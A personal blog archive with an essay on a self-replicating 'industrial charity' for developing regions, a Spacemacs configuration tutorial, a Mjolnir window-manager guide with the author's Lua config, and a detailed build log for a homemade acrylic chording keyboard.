The most interesting idea I’ve thought of, and I’m sure this idea isn’t unique, is the possibility of a viral industrial charity. Suppose there exists a set of machinery, tools and knowledge which a group of people can use to produce a second set of machines in a reasonable time span like one year. The other criterion for these machines is that they can be used to productively ensure a decent standard of living for those working on reproducing them.

If funding could be found to build one set of these machines, they could be set up in a third-world country as a kind of employer. A group of 100 or so people would be trained to use the machines and they would work to produce a new set and be compensated with the right to use the machines to provide themselves with good housing, food and other useful things. The magic comes once they finish the second set of machines and can use it to establish another village. Now there are two villages producing new sets and exponential growth takes hold. With luck the charity could grow to create thousands of new industrialized villages per year, with the only infusion of charity capital being the initial set, some management and perhaps a small kit for each new village of very difficult to produce items like machine control computers.
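To put rough numbers on the exponential growth, here is a tiny Python sketch. It assumes the idealized case where every village finishes exactly one new set each year and nothing ever fails, which real life certainly would not honour. The function name is made up.

```python
def first_year_with(target_new_villages):
    """Return (year, total_villages) for the first year in which at least
    target_new_villages new villages are founded, starting from one
    village and assuming each village founds one new village per year."""
    villages = 1
    year = 0
    while True:
        year += 1
        new = villages      # every existing village completes one set
        villages += new     # so the total doubles each year
        if new >= target_new_villages:
            return year, villages
```

Under these assumptions `first_year_with(1000)` returns `(11, 2048)`: the number of villages doubles every year, so the thousand-per-year mark is passed in year 11. Even if the real doubling time were several times longer, the shape of the curve is what makes the idea attractive.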

This is by no means a perfect plan, there are many potential issues. Chief among them is that this set of machinery does not yet exist. Technology is awesome but it is also hard and highly interdependent. It is difficult to satisfy both of the dual criteria of having no external dependencies and being useful for sustaining an independent village. There is a project called the Global Village Construction Set that is trying to do just this but it is slow and difficult. They have some great ideas but designing all these machines is a lot of work and they have not solved the closed dependency problem despite trying very hard. Many of their machines require some external parts such as ball bearings and microcontrollers, which need very precise dedicated machinery to produce. It is likely that any set of reproducing machines might need a box of small precision parts like ball bearings and integrated circuits to close the cycle. However, if this box is cheap enough a charity could support the exponential growth without too much fund raising.

The other technological challenge is resources. For the village to be self-sufficient it would have to produce its own materials and food. Farming can be done in many locations especially with good tools, but natural resources are often very spread out. The solution to this is probably to make everything out of a minimal set of different materials that are produced from very common natural resources. One idea from the Global Village Construction Set is the possibility of electrolyzing aluminum from clay. Clay is very common, easy to extract and can be used to make bricks, ceramic objects and aluminum metal (with some difficulty). A village built near a clay deposit, a river and some fertile land for farming with some natural or planted woodland nearby might be able to produce all the resources it needs. The village may still need to do some trading though, perhaps of aluminum for scrap steel to produce high stress specialized parts. Steel mining and refining is likely beyond the capability of a small village, yet steel is necessary for many useful machines.

The other thing to think about is the charity structure itself. It has the virtue of not being very dependent on the external economy and enabling self-sufficiency. However, it does require at least some managerial and government structure to ensure that the people living in the village continue producing new sets of machinery instead of just using them to satisfy their own needs. This should be possible in any country with a decent government, it could probably be set up legally as an employer, albeit an unconventional one. Villagers who stopped producing machinery would be breaking the law in the same way as factory employees would be if they started stealing the output of the factory and taking it home. And I’m sure the occupants/employees would at least feel content with the idea that the purpose of their hard work is to help lift others out of poverty. They would of course also be compensated with a standard of living higher than they were used to.

As long as no one has designed this theoretical village this plan remains just an idea. However, the Global Village Construction Set is doing a great job and it is possible that years in the future it will be polished enough that with some start up capital and planning this could be a real endeavour. For my part I might even try to help design some of the machines on their to-do list as a fun hobby and way of learning about machinery.

For anyone who found the content of this post interesting, I highly recommend you read The Knowledge and take a look at the wiki for the Global Village Construction Set. I just thought I’d put this idea out there to see if anyone else has comments on it, I by no means think this is a perfect plan and it likely would have many practical tripping points. However, if these problems could be solved its potential impact per dollar invested is amazing.

Configuring Spacemacs: A Tutorial

2015-03-07T00:00:00+00:00

Edit: Some things in this post are now outdated. I’m currently using Sublime Text with Vim keybindings instead of Spacemacs so I haven’t been keeping up. I’ve fixed some things (Thanks Fabien!) but others may remain. If you want to fix something outdated submit a PR to my website.

A few months ago I switched to using Spacemacs as my text editor of choice. It has great vim keybindings and extensive default configs for a variety of packages. I’ve become one of the top contributors to Spacemacs and I’ve learned a few things about configuring it in the process. This post will function as a tutorial to get you started with configuring Spacemacs to your liking.

You can get started using Spacemacs by following the installation instructions in the readme and perusing the in-depth documentation.

The .spacemacs File

The ~/.spacemacs file is your main starting point for configuring Spacemacs. If you don’t have this file you can install a template by pressing SPC : dotspacemacs/install RET in Spacemacs, where SPC is space and RET is the enter key. At any time you can press SPC f e d to edit this file.

The template comes with many variables that you can customize and use to set things like font sizes and window preferences. Once you are done editing, save the file and either press SPC f e R in the file to reload it or just restart Spacemacs.

Some parts of this file are more important than others:

dotspacemacs/user-config

This function is run after Spacemacs sets itself up. In here you can customize variables and activate extra functionality you want. Perhaps the most important thing to know is that this is generally where you can paste random snippets of Emacs Lisp you find on the internet. If a page says to put a snippet into your init.el file don’t do that, put it in dotspacemacs/user-config instead.

Another thing this function is useful for is setting the default state of some toggleable editor preferences. If you press SPC t you will see some of the things you can toggle, these include line numbers, line wrapping, current line highlight, etc…

Most of these toggles actually enable and disable “minor modes”, if you want some of these on or off by default you can put things like these in your dotspacemacs/user-config function:

(defun dotspacemacs/user-config ()
  (global-hl-line-mode -1) ; Disable current line highlight
  (global-linum-mode)) ; Show line numbers by default

dotspacemacs-configuration-layers

This brings us to configuration layers, the most central concept of Spacemacs. Not all parts of Spacemacs are enabled by default; there are a large number of user-contributed “layers” that add packages and configs for things like programming languages, external tools and extra functionality. Layers specify which packages they want Spacemacs to install for them and how to load each package, and they often include some default configs to make the package integrate well with the rest of Spacemacs.

The dotspacemacs-configuration-layers variable, set in the dotspacemacs/layers function near the top of the template, is where you specify which layers you want to include. When you find yourself wondering “does Spacemacs come with support for X?” you can simply type SPC f e h and search through the built-in layers. Once you find one you want, add it to the list in the variable’s set statement. This is what mine looks like:

dotspacemacs-configuration-layers '(extra-langs auctex
  company-mode git c-c++ haskell html javascript ruby ycmd
  smex dash colors lua trishume markdown finance)

Yah, I use a lot of layers; you should too, they’re pretty important! You can see staples like “html” and “ruby” as well as fancier functionality ones like “company-mode”. Try looking through the “layers” directory to see all the available contributed layers along with their Readmes and source code.

Your Own Layers!

You too could be the author of your very own layer! In fact, you’ll likely find you want to after you have used Spacemacs for a while. The most important purpose of layers is adding MELPA packages and the configuration and keybindings for them. Don’t try and just install packages with the default Emacs package manager like the internet might tell you to do!

If you want to install a package you found online, like 2048-game, you’ll want to create a layer that includes the package and sets it up. Another option for small things is to add the package to the dotspacemacs-additional-packages list. There are a couple of places you can put this layer, which is really just a folder with some Emacs Lisp files:

The “private” Directory

This is a folder in the main Spacemacs directory where you can put configuration layers for your own personal use. You can create a template layer in this directory using SPC : configuration-layer/create-layer RET.

The descriptive comments in the template packages.el do a pretty good job of explaining what to do. Basically you add the package you want to include to the yourlayernamehere-packages list and then create yourlayernamehere-init-yourpackagenamehere functions where you use use-package to load the package and set it up. Take a look at existing layers for examples of how to set up packages and keybindings.

Once you have written a layer you have to load it in .spacemacs just like any other layer. Add your layer’s name to dotspacemacs-configuration-layers.

dotspacemacs-configuration-layer-path

If you want to keep your layers in a git repository or Dropbox sync or some other folder, you can use the dotspacemacs-configuration-layer-path variable in .spacemacs to set another folder where you can load layers from. Then you can just copy the layer directory that Spacemacs puts in the private directory into this directory and Spacemacs will be able to load it from there.

The “contrib” Directory

If you are adding some awesome new functionality to Spacemacs, which you probably are, you should seriously consider contributing it back. This is how Spacemacs has grown into the awesome distribution that it is. Don’t worry about people finding it hacky or not useful, we won’t mind and might even help you make it better.

This is what I do. I’m proud to say that I only have 1 private layer; every other layer I’ve written has been contributed back to Spacemacs. It’s as simple as forking Spacemacs, adding your layer to contrib and submitting a Github pull request.

Tips For Writing Layers

There’s a couple things that are nice to know when writing layers. The most important is some of the features of use-package. You use this in the init functions in packages.el to load the package and set it up. It takes a package name and some attributes containing things like code to run on load. You use use-package instead of doing whatever loading step the package readme tells you to do, so generally you don’t include things like (require 'blah).

Basic Format

(defun finance/init-ledger-mode ()
  (use-package ledger-mode
    ; Use :mode to set language modes to automatically activate on certain extensions
    :mode ("\\.\\(ledger\\|ldg\\)\\'" . ledger-mode)
    ; :defer t activates lazy loading which makes startup faster
    :defer t
    ; The code in :init is always run, use it to set up config vars and key bindings
    :init
    (progn ; :init only takes one expression so use "progn" to combine multiple things
      ; You can configure package variables here
      (setq ledger-post-amount-alignment-column 62)
      ; Using evil-leader/set-key-for-mode adds bindings under SPC for a certain mode
      ; Use evil-leader/set-key to create global SPC bindings
      (evil-leader/set-key-for-mode 'ledger-mode
        "mhd"   'ledger-delete-current-transaction
        "m RET" 'ledger-set-month))
    :config ; :config is called after the package is actually loaded with defer
      ; You can put stuff that relies on the package like function calls here
      (message "Ledger mode was actually loaded!")))

Things that aren’t packages

If you want to bundle up some snippet or config that isn’t related to a package you can use the config.el file in the layer. In here you can just put Emacs Lisp code and functions that will be evaluated when a layer is loaded.

Dependencies

Sometimes you want to hook something in your layer into another package. This is most common for making sure your layer works well with default packages like smartparens. To do this you’ll want to use eval-after-load. Here’s an example of a package adding extra functionality to yaml-mode.

Other Information

This guide hopefully gave you enough info to get started, but there’s so much more to Spacemacs that isn’t here. There’s a bunch of other sources of information that you should look at if you can’t find what you want:

The Gitter Chat

Please visit the Gitter chat room if you have any questions about configuring or using Spacemacs that you can’t figure out, or just come to chat with other Spacemacs users. There’s always tons of knowledgeable people there, including the awesome maintainer @syl20bnr, who will help you out.

The Documentation

Most of these layer concepts and mechanics are explained in depth in the massive Documentation. It also has information on lots of the functionality available in Spacemacs.

The Source Code!

If you want deep insight into the workings of Spacemacs you should really take a look at the source code on Github. The main difference between me and the average Spacemacs user is that I have read lots of the source and thus I know a lot about how Spacemacs works. I swear it’s really not that complicated. You’ll discover that most of Spacemacs is actually just the spacemacs layer, which is just like any other configuration layer except it is included by default. You can also read the code for the contrib layers for ideas, although the techniques these use might be less consistent since they were written by lots of different people, many of them newbies. For a good start I recommend skimming through this packages.el file. You can also use SPC h SPC to search for layers and hit enter to visit their source.

Conclusion

I hope this helped you on your way to become a Spacemacs power-user. This guide was rather specific to configuration but I plan on maybe writing other tutorials on basic use and other tips. Don’t forget to say hi to me and all the other awesome Spacemacs people in the Gitter chat, we always love hearing from other Spacemacs users!

Using Mjolnir: An Extensible OSX Window Manager

2014-12-02T00:00:00+00:00

Edit: I am now using Hammerspoon which is a fork of Mjolnir that is basically the same except it comes with the modules (no luarocks), it’s under active development and the naming is slightly different and more consistent. Most of this article still applies.

Recently I started using the amazing and highly configurable window manager called Mjolnir. But really it isn’t a window manager; it’s an OSX wrapper around a Lua configuration file and event loop, with a constellation of modules that allow you to configure all sorts of computer control tasks. The most common use for Mjolnir is managing windows, but there are all sorts of modules that allow you to use it for doing things like unmounting your USB drives when you switch to battery power.

Two years ago I wrote a blog post about configuring Slate, the configurable window manager that I had been using until this month. However, the maintainer hasn’t worked on Slate in years and there are dozens of pull requests sitting around without being merged or commented on. There have been attempts to revive it, but there were still some rough edges and I decided to try something new.

Here I’ll describe how I use Mjolnir and my experience with it so far.

Getting Started

The instructions on Mjolnir’s homepage are pretty good as far as getting Mjolnir installed goes. You’ll need to get luarocks working and then create an init.lua file, which isn’t very hard. The basic install you get can’t do much, so you’ll have to use some of the many Mjolnir modules. Before you use a module you have to install it. To install mjolnir.hotkey you would run

luarocks install mjolnir.hotkey

Window Management

Mjolnir makes managing windows really easy with great modules, most of which are built upon the basic functionality found in mjolnir.application. That module provides basic access to running applications and their windows, which modules like mjolnir.bg.grid use to provide things like moving and resizing windows on a grid. There are even fancier modules like mjolnir.tiling, which automatically organizes your windows like a fancy Linux tiling window manager would.

Basic Key Bindings

Generally the way you want to start is by binding actions (really just Lua functions) to keys using the mjolnir.hotkey module. Here’s an example from the Mjolnir homepage of binding a key that just nudges a window right:

-- Load the modules the snippet uses
local hotkey = require "mjolnir.hotkey"
local window = require "mjolnir.window"

hotkey.bind({"cmd", "alt", "ctrl"}, "D", function()
  local win = window.focusedwindow()
  local f = win:frame()
  f.x = f.x + 10 -- move the frame 10 points to the right
  win:setframe(f)
end)

Since it’s just Lua code you can also just directly pass function names and use variables to refer to common chords:

local mash = {"ctrl", "shift"}
hotkey.bind(mash, "c", mjolnir.openconsole)

Using a Grid

Personally I found the easiest way of doing window management was to use the mjolnir.bg.grid module. It provides functions that allow you to shuffle windows around a grid of a configurable number of rows and columns (3x3 by default). Here’s an example of some basic bindings inspired by this config:

local grid = require "mjolnir.bg.grid"
local hotkey = require "mjolnir.hotkey"
local window = require "mjolnir.window"

grid.MARGINX = 0
grid.MARGINY = 0
grid.GRIDWIDTH = 2
grid.GRIDHEIGHT = 2

-- a helper function that returns another function that resizes the current window
-- to a certain grid size.
local gridset = function(x, y, w, h)
    return function()
        local cur_window = window.focusedwindow()
        grid.set(
            cur_window,
            {x=x, y=y, w=w, h=h},
            cur_window:screen()
        )
    end
end

local mash = {"ctrl", "shift"}
hotkey.bind(mash, 'n', grid.pushwindow_nextscreen)
hotkey.bind(mash, 'a', gridset(0, 0, 1, 2)) -- left half
hotkey.bind(mash, 's', grid.maximize_window)
hotkey.bind(mash, 'd', gridset(1, 0, 1, 2)) -- right half
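
To make the grid idea concrete, here is a rough sketch of the arithmetic that turns a grid cell like {x=0, y=0, w=1, h=2} into a pixel frame. It is written in Python purely for illustration and is not the grid module’s actual code: the Rect type, the cell_to_frame function and the way margins are applied are all my own assumptions.

```python
from dataclasses import dataclass


@dataclass
class Rect:
    """A rectangle, used both for grid cells (grid units) and frames (pixels)."""
    x: float
    y: float
    w: float
    h: float


def cell_to_frame(cell, screen, grid_width=3, grid_height=3, margin_x=0, margin_y=0):
    """Convert a cell in grid units into a pixel frame on the given screen.

    Hypothetical helper: the margin handling here (shrinking each side of
    the frame by the margin) is an assumption, not the module's behaviour.
    """
    cell_w = screen.w / grid_width
    cell_h = screen.h / grid_height
    return Rect(
        x=screen.x + cell.x * cell_w + margin_x,
        y=screen.y + cell.y * cell_h + margin_y,
        w=cell.w * cell_w - 2 * margin_x,
        h=cell.h * cell_h - 2 * margin_y,
    )


# A 2x2 grid on a 1440x900 screen, mirroring the "left half" and
# "right half" bindings above.
screen = Rect(0, 0, 1440, 900)
left_half = cell_to_frame(Rect(0, 0, 1, 2), screen, grid_width=2, grid_height=2)
right_half = cell_to_frame(Rect(1, 0, 1, 2), screen, grid_width=2, grid_height=2)
print(left_half, right_half)
```

With a 2x2 grid, a cell one column wide and two rows tall covers exactly half the screen, which is why gridset(0, 0, 1, 2) and gridset(1, 0, 1, 2) work as left-half and right-half bindings.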

Window Hints

One of my favourite parts of Mjolnir is that you can write your own modules in Lua and Objective C to hook into OSX functionality that Mjolnir doesn’t support by default. The great thing is other people have already written all sorts of modules to do things like controlling Spotify and playing sounds.

Recently I wrote my own module in 4 hours or so that adds the window hints feature that I missed from Slate: mjolnir.th.hints. Except I think I did it even better than Slate did. It allows you to quickly switch apps and windows using lettered “hints” that pop up when you hit a key; when you press a hint’s letter it switches to that app.

All you have to do is bind it to a key:

local hints = require "mjolnir.th.hints"
hotkey.bind({"cmd"},"e",hints.windowHints)
-- You can also use this with appfinder to switch to windows of a specific app
local appfinder = require "mjolnir.cmsj.appfinder"
hotkey.bind({"ctrl","cmd"},"k",function() hints.appHints(appfinder.app_from_name("Emacs")) end)

My Config

My personal config is a bit fancier and more specific to me than you might want to start off with, but you might want to get some ideas from it. You can find the latest version in my dotfiles repo, but I’ve included my config at the time of writing later on the page because it will probably be simpler than my config at the time you read this.

It has fancy features like rebinding the keys on keyboard layout change (which doesn’t always work). Probably the best feature is a crappy implementation of something that mimics Slate’s support for layouts.

Edit: see my dotfiles repo for the Hammerspoon version.

-- Load Extensions
local application = require "mjolnir.application"
local window = require "mjolnir.window"
local hotkey = require "mjolnir.hotkey"
local keycodes = require "mjolnir.keycodes"
local fnutils = require "mjolnir.fnutils"
local alert = require "mjolnir.alert"
local screen = require "mjolnir.screen"
-- User packages
local grid = require "mjolnir.bg.grid"
local hints = require "mjolnir.th.hints"
local appfinder = require "mjolnir.cmsj.appfinder"

local definitions = nil
local hyper = nil

local gridset = function(frame)
	return function()
		local win = window.focusedwindow()
		if win then
			grid.set(win, frame, win:screen())
		else
			alert.show("No focused window.")
		end
	end
end

auxWin = nil
function saveFocus()
  auxWin = window.focusedwindow()
  -- focusedwindow() can return nil, so only report when a window was saved
  if auxWin then
    alert.show("Window '" .. auxWin:title() .. "' saved.")
  end
end
function focusSaved()
  if auxWin then
    auxWin:focus()
  end
end

local hotkeys = {}

function createHotkeys()
  for key, fun in pairs(definitions) do
    local mod = hyper
    if string.len(key) == 2 and string.sub(key,2,2) == "c" then
      mod = {"cmd"}
    end

    local hk = hotkey.new(mod, string.sub(key,1,1), fun)
    table.insert(hotkeys, hk)
    hk:enable()
  end
end

function rebindHotkeys()
  for i, hk in ipairs(hotkeys) do
    hk:disable()
  end
  hotkeys = {}
  createHotkeys()
  alert.show("Rebound Hotkeys")
end

function applyPlace(win, place)
  local scrs = screen:allscreens()
  local scr = scrs[place[1]]
  grid.set(win, place[2], scr)
end

function applyLayout(layout)
  return function()
    for appName, place in pairs(layout) do
      local app = appfinder.app_from_name(appName)
      if app then
        for i, win in ipairs(app:allwindows()) do
          applyPlace(win, place)
        end
      end
    end
  end
end

function init()
  createHotkeys()
  keycodes.inputsourcechanged(rebindHotkeys)
  alert.show("Mjolnir, at your service.")
end

-- Actual config =================================

hyper = {"cmd", "alt", "ctrl","shift"}
-- Set grid size.
grid.GRIDWIDTH  = 6
grid.GRIDHEIGHT = 8
grid.MARGINX = 0
grid.MARGINY = 0
local gw = grid.GRIDWIDTH
local gh = grid.GRIDHEIGHT

local gomiddle = {x = 1, y = 1, w = 4, h = 6}
local goleft = {x = 0, y = 0, w = gw/2, h = gh}
local goright = {x = gw/2, y = 0, w = gw/2, h = gh}
local gobig = {x = 0, y = 0, w = gw, h = gh}

local fullApps = {
  "Safari","Aurora","Nightly","Xcode","Qt Creator","Google Chrome",
  "Google Chrome Canary", "Eclipse", "Coda 2", "iTunes", "Emacs", "Firefox"
}
local layout2 = {
  Airmail = {1, gomiddle},
  Spotify = {1, gomiddle},
  Calendar = {1, gomiddle},
  Dash = {1, gomiddle},
  iTerm = {2, goright},
  MacRanger = {2, goleft},
}
fnutils.each(fullApps, function(app) layout2[app] = {1, gobig} end)

definitions = {
  [";"] = saveFocus,
  a = focusSaved,

  h = gridset(gomiddle),
  t = gridset(goleft),
  n = grid.maximize_window,
  s = gridset(goright),

  g = applyLayout(layout2),

  d = grid.pushwindow_nextscreen,
  r = mjolnir.reload,
  q = function() appfinder.app_from_name("Mjolnir"):kill() end,

  k = function() hints.appHints(appfinder.app_from_name("Emacs")) end,
  j = function() hints.appHints(window.focusedwindow():application()) end,
  ec = hints.windowHints
}

-- launch and focus applications
fnutils.each({
  { key = "o", app = "MacRanger" },
  { key = "e", app = "Google Chrome" },
  { key = "u", app = "Emacs" },
  { key = "i", app = "iTerm" },
  { key = "m", app = "Airmail" }
}, function(object)
    definitions[object.key] = function() application.launchorfocus(object.app) end
end)

init()
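
The one- and two-character keys in the definitions table follow a small convention that createHotkeys decodes: a bare key is bound under the hyper chord, while a second character of "c" means “bind it under plain cmd instead”. Here is that decoding step on its own, sketched in Python for illustration. The parse_key_spec name is hypothetical; the logic mirrors the string.len and string.sub checks in the config above.

```python
HYPER = ("cmd", "alt", "ctrl", "shift")


def parse_key_spec(spec, hyper=HYPER):
    """Return (modifiers, key) for a one- or two-character key spec.

    Mirrors createHotkeys above: the first character is the key, and a
    trailing "c" swaps the hyper chord for plain cmd.
    """
    if len(spec) == 2 and spec[1] == "c":
        return (("cmd",), spec[0])
    return (tuple(hyper), spec[0])


for spec in ["h", ";", "ec"]:
    print(spec, "->", parse_key_spec(spec))
```

So "ec" in the table is cmd+e for window hints, while "h" is hyper+h.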

Designing and Building a Keyboard: The Body

2014-09-08T00:00:00+00:00

This summer I set myself the task of designing and building a chording keyboard from scratch. Chording keyboards use a different system of typing where you type entire syllables or words in a single stroke by pressing multiple keys at a time. My keyboard is designed to use a system similar to Velotype. This should theoretically let me type at up to 200WPM.

To spoil the ending I managed to build a pretty sweet keyboard that I am using to type this very article. However, I haven’t written the chording software yet so I’m currently using it as a Dvorak keyboard.

Update 10/10/2016: I’ve been using the keyboard for 2 years now. I wrote the chording firmware and tried learning it but after a month I was still typing at 3wpm. But I did end up really liking the keyboard layout used normally so it’s still my primary keyboard. I’ve also upgraded the hardware with cool RGB LEDs. I use the palm keys with a set of Sublime Text shortcuts that is like VIM but the mode is set by the physical state of my palms. This integrates better with the mouse, I never type in the wrong mode, and it’s better for quickly doing something in another mode.

When I started the project I thought it might take 2 weeks to finish the hardware and then I would spend the rest of the summer on software. Boy was I wrong! It took me a month to finish the case and another month of evenings spent soldering after work. I managed to complete the hardware before heading off to Waterloo but only barely.

This post will be mostly about the case and key switches, next I’ll write about the electronics, then the layout (once I design it), and then the software (once I write it).

Overview

The Keys

One thing about chording keyboards is that since you have to press many keys at the same time, it is nice to have very low activation force key switches so that your hands don’t have to work as hard to press more switches.

The Velotype uses custom rubber dome switches with a 15g activation force but those require custom molded silicone sheets and a PCB. Instead I modified Cherry MX Red key switches, which are already some of the lowest force switches out there, and I cut the springs down from 1.5cm to 1.0cm. This gave them an activation force of around 20g instead of 45g.

For the key caps I pulled the black blank ones off my Das Keyboard since I figured that buying and shipping a new set of key caps would cost more than the resale value of my (now redundant) Das.

The Case

The case was made with layered acrylic sheets cut on the laser cutter at my local library. The layers are bolted together with machine screws with rubber feet at the bottom. The layout is my own design inspired by the Velotype Pro and the Ergodox. The top and bottom layers are thin black acrylic to give the keyboard a nice look and hide the internals. Features include a carrying handle, palm keys and a space for an LCD screen.

The Design

I did all the design in the (free!) student edition of AutoCad. I used cherry switch hole specs posted on the GeekHack forum that I fine tuned by laser cutting small test plates. Before doing the final cut in acrylic I cut one prototype in cheap MDF and also a one-button test keyboard in acrylic. This let me catch a couple design flaws and fine tune my CAD model before the final cut.

My original plan was to draw up the CAD files in two days and then cut them the next day, then spend the next couple days soldering. Turns out I dramatically underestimated the difficulty of designing quality hardware. It took me a week to do the CAD models alone. I had to design the layout, print multiple tests on paper to test ergonomics, then draw up the key cutouts, layout, case and internal pockets in AutoCad. Then I spent days tweaking the kerf, screw placement and PCB pocket size so that everything would fit together well.

The Full Story - Detailed Build Log

The Original Plan (Backstory, skip if you want)

This whole crazy quest started when I got the idea of trying to build a mag-lev hall effect keyboard. The switches would levitate on magnets inside shafts above a hall effect sensor, this would allow very smooth low force switches that gave back analogue signals. This would allow cool things like variable-speed WASD gaming and detection of different typing styles.

I made some crappy prototypes with fridge magnets and paper and it seemed promising, so I ordered some hall effect sensors off Digikey and used OpenSCAD to design some 3D models for key switches. I 3D printed them at my library. The first print didn’t turn out well, but I tweaked the model and got a decent one. However, the switches didn’t feel very good, since smooth shaft sliding requires very tight tolerances and even the very nice SLA 3D printer I was using couldn’t make switches that didn’t wobble and scrape.

I ended up abandoning the project because after further testing I discovered that the magnets in adjacent switches would repel each other, causing very weird responses and things like keys being twice as hard to press down when the adjacent one was down. This problem could only be solved by using springs to keep the key up and then switching to weaker magnets, or by shielding each key with something like mu-metal. This is a purely mechanical problem; the hall effect sensors actually weren’t interfered with much by adjacent magnets because they only measure the field strength in one axis.

The Real Quest Begins

After giving up on mag-lev I tried cutting the springs on a cherry brown switch and ended up with a decent low force key switch. Thus started the quest to build a custom chording keyboard. Goals included low force, low cost, ergonomic design, full programmability, and the ability to use it as a normal keyboard.

I started out by doing a bunch of research on other people’s custom keyboards and reading Geekhack threads and blog posts. I used some ideas from the Ergodox, the Atreus, and of course the Velotype Pro.

Drawing up the CAD File

The Layout

I started my layout off by just setting up a massive rectangular grid of keys in AutoCad. I then printed it off at actual size and used my own hand to stagger the columns to match my fingers. One major difference from normal keyboards is that the home row position of the pinky finger is actually one physical row down from the middle, an idea I took from the Velotype. This position is much nicer ergonomically given how short the pinky fingers are; it is just unconventional.

I then used the same print, measure, adjust model, repeat technique to place the thumb cluster and palm keys. The final step was tweaking the layout so that it could use a standard key cap set. This meant doing things like using 1.25U keys for the thumbs instead of 1.5U because there are more of them. While doing this I also kept in mind that each row of key caps has a different profile.

The final step was to mirror the one sided layout to the other side and then measure the natural distance between my hands in order to determine the separation.

The Rest of The Case

After drawing up the layout I had to design the rest of the case. I drew a box around the outside and then some interior pockets for the wiring. I measured the piece of perfboard and the LCD I had decided on and then put in pockets for those and added channels to the wiring pockets. Then I rounded all the corners to reduce the number of pointy edges as well as the risk of the acrylic cracking.

Finally I placed the bolt holes in locations that were structurally important and also were solid on all layers. I then measured where the screw holes were on the circuit boards and put those in on the bottom for mounting.

I had drawn the various pockets on different layers in AutoCad so I created a viewport for each physical layer of acrylic and then just set which layers I wanted drawn on each viewport. Bolt holes on all layers, switch holes on the plate layer, etc…

Acquiring Materials

Now that I had my CAD files it was time to acquire the acrylic I needed to cut them in. I called up the Laird Plastics in Ottawa and they had the acrylic I needed but only in $100 4 foot x 8 foot sheets. This was a great price per square foot but it was way more than I needed. So I checked out Canus Plastics and they had the exact acrylic thickness and colours I needed and they even cut me sheets of the size I wanted while I waited. I also went around the back to their dumpster and found some nice off-cuts for practice material.

I got 2 sheets of 43cmx24cm eighth inch black acrylic and 3 sheets of quarter inch 43cmx24cm clear acrylic for $50.

I also went to Home Depot and bought the right size of machine screws as well as some $3 sheets of MDF in the same thicknesses as my acrylic.

Stop, Prototype!

Switch Cutout Kerf

The first thing I wanted to tune was the tightness of my switch cutouts. My acrylic plate was quarter inch thick clear acrylic, which is too thick for the switches to snap in, so they are friction fit. This meant I had to get the fit very close because I had no PCB to hold the switches in and I didn’t want them popping out if I tried to take off the key caps or turned the keyboard upside down.

I ended up printing 6 different small acrylic test sheets including various insets and resizings of different cherry switch cutout shapes. I measured the results that came off the laser cutter with calipers and found that the laser had 0.2mm kerf in the material I was using.

After adjusting for the kerf I had to figure out how tight I wanted the switch holes. Here are the results of my testing, measured against the Cherry width spec of 19.05mm with calipers:

-0.15mm : Very loose fit, some play, can't pull keycap without pulling out switch.
          Keyboard made like this would fall apart easily if it didn't have a PCB.
-0.10mm : Same as -0.15mm, maybe imperceptibly tighter.
 0.00mm : Cherry Spec. Holds switches to be very robust without a PCB. Almost zero play.
          Still not tight enough to pull a keycap without pulling out switch.
+0.05mm : Very nice solid fit. Can pull a keycap off without pulling switch.
+0.10mm : Quite tight without stressing switch.
          Can easily pull keycap off without feeling switch move.
          Takes effort to pop out.
          I'm going to use this for my board since it won't have a PCB.

For my final version I decided on the +0.1mm inset (0.3mm once the laser kerf is accounted for).
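
The arithmetic behind that 0.3mm figure is simple enough to sketch. This is a minimal Python illustration, not something I used at the time. It assumes the 0.2mm kerf means every cut hole comes out 0.2mm wider in total than it was drawn, and the function name is made up for the example.

```python
def drawn_cutout_width(nominal_mm, tightening_mm, kerf_mm):
    """Width to draw in CAD so the cut hole ends up tightening_mm under nominal.

    Assumes the laser widens every hole by kerf_mm in total, so the drawing
    has to be shrunk by the desired tightening plus the kerf.
    """
    return nominal_mm - tightening_mm - kerf_mm


CHERRY_WIDTH_MM = 19.05  # the spec width quoted above
KERF_MM = 0.2            # measured with calipers on the test sheets
TIGHTENING_MM = 0.1      # the "+0.10mm" row from the fit tests

# Round to hundredths of a millimetre to hide floating point noise.
total_inset = round(TIGHTENING_MM + KERF_MM, 2)
drawn = round(drawn_cutout_width(CHERRY_WIDTH_MM, TIGHTENING_MM, KERF_MM), 2)
print(total_inset, drawn)
```

The same function covers the other rows of the fit test by passing a negative tightening for the looser fits.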

I also printed some plates to test friction mounting the stabilizers. Turns out you can’t friction mount them and you have to make the slots wider and hot glue them. My CAD models include large stabilizer slots but I didn’t end up installing the stabilizers since they turned out to be unnecessary.

Cute Lil’ Mini Keyboard

To test the acrylic layering, the bolt holes, the border width and the cutting itself, I drew up a one key test keyboard that I printed and bolted together. It helped me discover that my bolt holes were too close to the edges for my rubber feet to fit. It also looks super cute. I left a hole for a cable so that I can eventually hook it up in case I come up with a good idea for it.

MDF Prototype

So that I didn’t mess up my $50 acrylic sheets I did a test cut in $4 worth of crappy MDF/hardboard and I’m glad I did. This prototype helped me discover that the USB cable didn’t really fit into the case cutout and that I had forgotten to turn some switch cutouts sideways. It also helped me be confident that the final cuts would turn out as I wanted them to.

Modifying Switches

After I cut the MDF prototype I spent two one-hour sessions in the basement modifying key switches. For each switch I opened it using toothpicks, took out the spring and put it up against a ruler, grabbed it with my wire snippers at the correct point, moved it over a dish and snipped it. Then I put the switch back together and tested the feel. If a switch felt too light I tested it with a multimeter to make sure it didn’t stay down after I pressed it. If it did, I tossed it into a rejects pile.

I only modified 46 switches, which was enough for all the keys used in chording. The extra keys, which are only used for normal typing and special characters, are unmodified. I did all 46 at around 1.5 minutes per switch median time with only 5 rejects (it took significantly longer for some switches because of additional testing).

The source switches were a bag of 110 Cherry MX Reds I bought for $50. I chose Cherry Reds because they work better for low force modification since they don’t have a tactile bump. When I tried modifying Browns sometimes the switch would get stuck on the bump on the way up.

After modifying the switches I mounted them in my MDF prototype with the low force switches in the right places and normal switches everywhere else. Afterwards I put my Das Keyboard key caps on making sure to use the correct rows. I then had a feel-complete version of my keyboard that I could try typing on, it was pretty nice!

Final Cutting

With all my prototyping done I biked to the library with my CAD files and acrylic sheets and spent an hour sitting next to a laser cutter while reading Hacker News and occasionally switching plates and printing a new file and sometimes watching the laser cutter slowly turn a featureless sheet into the keyboard I had been working on for a month.

Everything went excellently and I took my sheets home, bolted them together and tested that things fit. I then started transferring switches and keycaps from their respective positions on the MDF prototype to the final acrylic plate.

One interesting thing I discovered was how susceptible to fingerprints, hair and dust the layered acrylic design is. It doesn’t affect the functionality but it sure looks ugly. When assembling the layers I had to wear rubber gloves and wipe each layer down with a microfiber cloth before bolting them together.

